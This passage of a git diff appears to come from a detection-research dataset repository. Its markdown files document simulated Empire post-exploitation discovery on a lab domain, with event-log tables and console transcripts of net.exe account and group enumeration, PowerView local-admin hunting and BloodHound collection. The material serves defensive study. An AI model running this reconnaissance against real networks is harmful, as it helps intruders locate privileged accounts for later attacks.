+ +(Empire: powershell/situational_awareness/network/powerview/find_localadmin_access) > execute +[*] Tasked V6W3TH8Y to run TASK_CMD_JOB +[*] Agent V6W3TH8Y tasked with task ID 11 +[*] Tasked agent V6W3TH8Y to run module powershell/situational_awareness/network/powerview/find_localadmin_access +(Empire: powershell/situational_awareness/network/powerview/find_localadmin_access) > Job started: X3U8SY +HFDC01.shire.com +IT001.shire.com + +Find-LocalAdminAccess completed! + + +(Empire: powershell/situational_awareness/network/powerview/find_localadmin_access) > +``` \ No newline at end of file diff --git a/small_datasets/windows/discovery/account_discovery_T1087/empire_find_local_admin.tar.gz b/small_datasets/windows/discovery/account_discovery_T1087/empire_find_local_admin.tar.gz new file mode 100644 index 00000000..60930d57 Binary files /dev/null and b/small_datasets/windows/discovery/account_discovery_T1087/empire_find_local_admin.tar.gz differ diff --git a/small_datasets/windows/discovery/account_discovery_T1087/local_users/empire_net_user.md b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user.md similarity index 99% rename from small_datasets/windows/discovery/account_discovery_T1087/local_users/empire_net_user.md rename to small_datasets/windows/discovery/account_discovery_T1087/empire_net_user.md index 7b696c5a..27d64d3b 100644 --- a/small_datasets/windows/discovery/account_discovery_T1087/local_users/empire_net_user.md +++ b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user.md @@ -1,5 +1,4 @@ - -# Empire Net User +# Empire Net User Local An adversary can enumerate local users via the net.exe utility @@ -55,7 +54,7 @@ Shire | Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | | Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 110 | -## Empire Activity +## Attacker Activity ``` shell net user 
diff --git a/small_datasets/windows/discovery/account_discovery_T1087/local_users/empire_net_user.tar.gz b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user.tar.gz similarity index 99% rename from small_datasets/windows/discovery/account_discovery_T1087/local_users/empire_net_user.tar.gz rename to small_datasets/windows/discovery/account_discovery_T1087/empire_net_user.tar.gz index 2bd5b6d2..6ee86ef0 100644 Binary files a/small_datasets/windows/discovery/account_discovery_T1087/local_users/empire_net_user.tar.gz and b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user.tar.gz differ diff --git a/small_datasets/windows/discovery/account_discovery_T1087/domain_users/empire_net_user_domain.md b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain.md similarity index 99% rename from small_datasets/windows/discovery/account_discovery_T1087/domain_users/empire_net_user_domain.md rename to small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain.md index 457e4fd1..3e3b4c57 100644 --- a/small_datasets/windows/discovery/account_discovery_T1087/domain_users/empire_net_user_domain.md +++ b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain.md @@ -1,5 +1,4 @@ - -# Empire Net User +# Empire Net User Domain An adversary can enumerate all users that belong to a domain via the net.exe utility @@ -49,7 +48,7 @@ Shire | Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 1 | | Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 93 | -## Empire Activity +## Attacker Activity ``` shell net user /domain 
diff --git a/small_datasets/windows/discovery/account_discovery_T1087/domain_users/empire_net_user_domain.tar.gz b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain.tar.gz similarity index 100% rename from small_datasets/windows/discovery/account_discovery_T1087/domain_users/empire_net_user_domain.tar.gz rename to small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain.tar.gz diff --git a/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain_specific.md b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain_specific.md new file mode 100644 index 00000000..6ce06caf --- /dev/null +++ b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain_specific.md 
@@ -0,0 +1,96 @@ +# Empire Net User Domain Specific + +An adversary can gather information about a specific domain user via the net.exe utility + +## Technique(s) ID + +T1087 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_net_user_domain_specific.tar.gz](./empire_net_user_domain_specific.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18230446 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|------------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 440 | +| System | Microsoft-Windows-Directory-Services-SAM | na | 42 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 361 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 87 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 24 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 8 | +| Security | Microsoft-Windows-Security-Auditing | SAM | 8 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 6 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 5 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 5 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 4 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 4 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 3 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 3 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 2 | +| Microsoft-Windows-WMI-Activity/Operational | 
Microsoft-Windows-WMI-Activity | na | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 381 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 158 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 101 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 78 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 27 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 364 | + +## Attacker Activity + +``` +(Empire: TKV35P8X) > shell net user pgustavo /domain +[*] Tasked TKV35P8X to run TASK_SHELL +[*] Agent TKV35P8X tasked with task ID 38 +(Empire: TKV35P8X) > The request will be processed at a domain controller for domain shire.com. 
+ +User name pgustavo +Full Name Pedro Gustavo +Comment +User's comment +Country/region code 000 (System Default) +Account active Yes +Account expires Never + +Password last set 1/14/2019 1:20:18 PM +Password expires Never +Password changeable 1/15/2019 1:20:18 PM +Password required Yes +User may change password Yes + +Workstations allowed All +Logon script +User profile +Home directory +Last logon 5/18/2019 5:32:46 PM + +Logon hours allowed All + +Local Group Memberships *SG DL shire Workstati +Global Group memberships *Domain Users *Domain Admins +The command completed successfully. + + +..Command execution completed. + +(Empire: TKV35P8X) > +``` \ No newline at end of file diff --git a/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain_specific.tar.gz b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain_specific.tar.gz new file mode 100644 index 00000000..46e64eeb Binary files /dev/null and b/small_datasets/windows/discovery/account_discovery_T1087/empire_net_user_domain_specific.tar.gz differ diff --git a/small_datasets/windows/discovery/account_discovery_T1087/local_users/README.md b/small_datasets/windows/discovery/account_discovery_T1087/local_users/README.md deleted file mode 100644 index ef8495c1..00000000 --- a/small_datasets/windows/discovery/account_discovery_T1087/local_users/README.md +++ /dev/null @@ -1,9 +0,0 @@ -# Local Users - -An adversary can enumerate users that exist locally in the endpoint - -## Technique Variations Table - -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_net_user](./empire_net_user.md) | 2019-03-19020729 | \ No newline at end of file diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/README.md b/small_datasets/windows/discovery/permissions_group_discovery_T1069/README.md new file mode 100644 index 00000000..f0eb01df --- /dev/null 
+++ b/small_datasets/windows/discovery/permissions_group_discovery_T1069/README.md @@ -0,0 +1,11 @@ +# Permissions Group Discovery + +Adversaries may attempt to find local system or domain-level groups and permissions settings. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_net_local_admins](./empire_net_local_admins.md) | 2019-03-19020147 | +| shire | [empire_bloodhound](./empire_bloodhound.md) | 2019-03-19031847 | +| shire | [empire_net_domain_admins](./empire_net_domain_admins.md) | 2019-05-18201207 | \ No newline at end of file diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/README.md b/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/README.md deleted file mode 100644 index d4789a48..00000000 --- a/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/README.md +++ /dev/null @@ -1,10 +0,0 @@ -# Domain Groups - -An adversary can easily enumerate members of an active directory group - -## Technique Variations Table - -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_net_domain_admins](./empire_net_domain_admins.md) | 2019-03-19014732 | -| empire | shire | [empire_net_domain_admins_restrict_sam](./empire_net_domain_admins_restrict_sam.md) | 2019-04-0301001 | \ No newline at end of file diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domain_admins.md b/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domain_admins.md deleted file mode 100644 index 90758e32..00000000 --- a/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domain_admins.md +++ /dev/null 
@@ -1,83 +0,0 @@ - -# Empire Net Domain Admins Group - -An adversary can enumerate members of the "Domain Admins" active directory group via net.exe - -## Technique(s) ID - -T1069 - -## Creators - -Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) - -## Dataset - -[empire_net_domain_admins.gz](./empire_net_domain_admins.gz) - -## Network Environment - -Shire - -## Time Taken - -2019-03-19014732 - -## About this file - -| log_name | source_name | task | record_number | -|------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| -| Windows PowerShell | PowerShell | Pipeline Execution Details | 220 | -| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 276 | -| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 264 | -| Security | Microsoft-Windows-Security-Auditing | Group Membership | 20 | -| Security | Microsoft-Windows-Security-Auditing | Logon | 20 | -| Security | Microsoft-Windows-Security-Auditing | Process Termination | 17 | -| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 15 | -| Security | Microsoft-Windows-Security-Auditing | Logoff | 15 | -| Security | Microsoft-Windows-Security-Auditing | Process Creation | 12 | -| Security | Microsoft-Windows-Security-Auditing | Special Logon | 10 | -| Security | Microsoft-Windows-Security-Auditing | File Share | 5 | -| Security | Microsoft-Windows-Security-Auditing | SAM | 4 | -| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 3 | -| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 1 | -| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 1 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 412 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded 
(rule: ImageLoad) | 386 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 125 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 65 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 57 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 22 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 11 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 5 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 1 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 184 | -| Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 188 | - -## Empire Activity - -``` -shell net group "Domain Admins" /domain -``` - -``` -(Empire: FD6A3MGY) > -[*] Tasked FD6A3MGY to run TASK_SHELL -[*] Agent FD6A3MGY tasked with task ID 3 -(Empire: FD6A3MGY) > The request will be processed at a domain controller for domain shire.com. - -Group name Domain Admins -Comment Designated administrators of the domain - -Members - -------------------------------------------------------------------------------- -Administrator Mmidge oda -The command completed successfully. - - -..Command execution completed. - -(Empire: FD6A3MGY) > -``` \ No newline at end of file 
diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domain_admins.tar.gz b/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domain_admins.tar.gz deleted file mode 100644 index 2469ef9e..00000000 Binary files a/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domain_admins.tar.gz and /dev/null differ diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domain_admins_restrict_sam.tar.gz b/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domain_admins_restrict_sam.tar.gz deleted file mode 100644 index af118295..00000000 Binary files a/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domain_admins_restrict_sam.tar.gz and /dev/null differ diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/empire_bloodhound.md b/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_bloodhound.md similarity index 99% rename from small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/empire_bloodhound.md rename to small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_bloodhound.md index 21a3227f..9acdab70 100644 --- a/small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/empire_bloodhound.md +++ b/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_bloodhound.md @@ -1,4 +1,3 @@ - # Empire Bloodhund An adversary can enumerate members of local groups via LDAP @@ -57,7 +56,7 @@ Shire | Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 383 | | Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 745 | -## Empire Activity +## Attacker Activity ``` usemodule situational_awareness/network/bloodhound 
diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/empire_bloodhound.tar.gz b/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_bloodhound.tar.gz similarity index 100% rename from small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/empire_bloodhound.tar.gz rename to small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_bloodhound.tar.gz diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domainn_admins_restrict_sam.md b/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_domain_admins.md similarity index 58% rename from small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domainn_admins_restrict_sam.md rename to small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_domain_admins.md index 53053ea2..a622b482 100644 --- a/small_datasets/windows/discovery/permissions_group_discovery_T1069/domain_groups/empire_net_domainn_admins_restrict_sam.md +++ b/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_domain_admins.md @@ -1,4 +1,3 @@ - # Empire Net Domain Admins Group An adversary can enumerate members of the "Domain Admins" active directory group via net.exe. However, if an organization restricts clients allowed to make remote calls to SAM, only specific users can enumerate users and groups in the local Security Accounts Manager (SAM) database and Active Directory. @@ -13,7 +12,7 @@ Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) ## Dataset -[empire_net_domain_admins_restrict_sam.gz](./empire_net_domain_admins_restrict_sam.gz) +[empire_net_domain_admins.tar.gz](./empire_net_domain_admins.tar.gz) ## Network Environment 
@@ -21,69 +20,62 @@ Shire ## Time Taken -2019-04-0301001 +2019-05-18201207 ## About this file | log_name | source_name | task | record_number | |--------------------------------------------|------------------------------------------|--------------------------------------------------------|-----------------| -| Windows PowerShell | PowerShell | Pipeline Execution Details | 266 | -| System | Microsoft-Windows-Directory-Services-SAM | na | 1 | -| System | Service Control Manager | na | 1 | -| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 4947 | -| Security | Microsoft-Windows-Security-Auditing | Other Policy Change Events | 1906 | -| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 901 | -| Security | Microsoft-Windows-Security-Auditing | MPSSVC Rule-Level Policy Change | 226 | -| Security | Microsoft-Windows-Security-Auditing | Process Creation | 90 | -| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 70 | -| Security | Microsoft-Windows-Security-Auditing | Process Termination | 41 | -| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 40 | -| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 33 | -| Security | Microsoft-Windows-Security-Auditing | Logon | 32 | -| Security | Microsoft-Windows-Security-Auditing | Group Membership | 29 | -| Security | Microsoft-Windows-Security-Auditing | User Account Management | 28 | -| Security | Microsoft-Windows-Security-Auditing | Special Logon | 22 | -| Security | Microsoft-Windows-Security-Auditing | Registry | 21 | -| Security | Microsoft-Windows-Security-Auditing | Security System Extension | 21 | -| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 20 | -| Security | Microsoft-Windows-Security-Auditing | Security Group Management | 14 | -| Security | Microsoft-Windows-Security-Auditing | Logoff | 8 | -| Security | Microsoft-Windows-Security-Auditing | Other Object 
Access Events | 5 | -| Security | Microsoft-Windows-Security-Auditing | Kernel Object | 4 | -| Security | Microsoft-Windows-Security-Auditing | Other System Events | 3 | -| Security | Microsoft-Windows-Security-Auditing | Plug and Play Events | 3 | -| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | -| Security | Microsoft-Windows-Security-Auditing | SAM | 2 | -| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 1 | -| Security | Microsoft-Windows-Security-Auditing | System Integrity | 1 | +| Windows PowerShell | PowerShell | Pipeline Execution Details | 146 | +| System | Microsoft-Windows-Directory-Services-SAM | na | 21 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 70 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 44 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 12 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 4 | +| Security | Microsoft-Windows-Security-Auditing | SAM | 4 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 3 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 2 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 2 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 2 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 2 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 2 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 2 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 1 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 1 | | Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 1 | -| 
Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 4958 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 4487 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 430 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 122 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 116 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 75 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 74 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 70 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 33 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Driver loaded (rule: DriverLoad) | 5 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 3 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 221 | -| Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 432 | - -## Empire Activity +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 236 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 65 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 35 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 35 | +| 
Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 13 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 119 | + +## Attacker Activity ``` -(Empire: NZB6SE34) > shell net group "Domain Admins" /domain -``` +(Empire: TKV35P8X) > shell net group "Domain Admins" /domain +[*] Tasked TKV35P8X to run TASK_SHELL +[*] Agent TKV35P8X tasked with task ID 14 +(Empire: TKV35P8X) > The request will be processed at a domain controller for domain shire.com. -``` -[*] Tasked NZB6SE34 to run TASK_SHELL -[*] Agent NZB6SE34 tasked with task ID 20 -(Empire: NZB6SE34) > The request will be processed at a domain controller for domain shire.com. +Group name Domain Admins +Comment Designated administrators of the domain + +Members + +------------------------------------------------------------------------------- +Administrator Mmidge oda +pgustavo +The command completed successfully. ..Command execution completed. -(Empire: NZB6SE34) > +(Empire: TKV35P8X) > ``` diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_domain_admins.tar.gz b/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_domain_admins.tar.gz new file mode 100644 index 00000000..8ccfa68c Binary files /dev/null and b/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_domain_admins.tar.gz differ 
diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/empire_net_local_admins.md b/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_local_admins.md similarity index 99% rename from small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/empire_net_local_admins.md rename to small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_local_admins.md index 65f296fe..2bbd6d78 100644 --- a/small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/empire_net_local_admins.md +++ b/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_local_admins.md @@ -1,4 +1,3 @@ - # Empire Net Local Administrators Group An adversary can enumerate members of the local Administratrors group via the net.exe utility @@ -55,7 +54,7 @@ Shire | Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 186 | | Microsoft-Windows-Bits-Client/Operational | Microsoft-Windows-Bits-Client | na | 2 | -## Empire Activity +## Attacker Activity ``` shell net localgroup "Administrators" diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/empire_net_local_admins.tar.gz b/small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_local_admins.tar.gz similarity index 100% rename from small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/empire_net_local_admins.tar.gz rename to small_datasets/windows/discovery/permissions_group_discovery_T1069/empire_net_local_admins.tar.gz diff --git a/small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/README.md b/small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/README.md deleted file mode 100644 index 72d43f8a..00000000 --- a/small_datasets/windows/discovery/permissions_group_discovery_T1069/local_groups/README.md +++ /dev/null 
@@ -1,10 +0,0 @@ -# Local Groups - -An adversary can easily enumerate members of a local group - -## Technique Variations Table - -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_net_local_admins](./empire_net_local_admins.md) | 2019-03-19020147 | -| empire | shire | [empire_bloodhound](./empire_bloodhound.md) | 2019-03-19031847 | \ No newline at end of file diff --git a/small_datasets/windows/discovery/system_network_connections_discovery_T1049/README.md b/small_datasets/windows/discovery/system_network_connections_discovery_T1049/README.md new file mode 100644 index 00000000..383bf12b --- /dev/null +++ b/small_datasets/windows/discovery/system_network_connections_discovery_T1049/README.md @@ -0,0 +1,10 @@ +# System Network Connection Discovery + +Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_get_session_dc](./empire_get_session_dc.md) | 2019-05-19005609 | +| shire | [empire_get_session_local](./empire_get_session_local.md) | 2019-05-19005224 | \ No newline at end of file diff --git a/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_dc.md b/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_dc.md new file mode 100644 index 00000000..8419ee81 --- /dev/null +++ b/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_dc.md 
@@ -0,0 +1,106 @@ +# Empire Get Session DC + +Execute the NetSessionEnum Win32API call to query a given host for active sessions on the host. + +## Technique(s) ID + +T1049 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_get_session_dc.tar.gz](./empire_get_session_dc.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-19005609 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 659 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 8 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 170 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 82 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 24 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 6 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 5 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 5 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 4 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 2 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 1 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Authentication Service | 1 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 1 | +| Microsoft-Windows-WMI-Activity/Operational | 
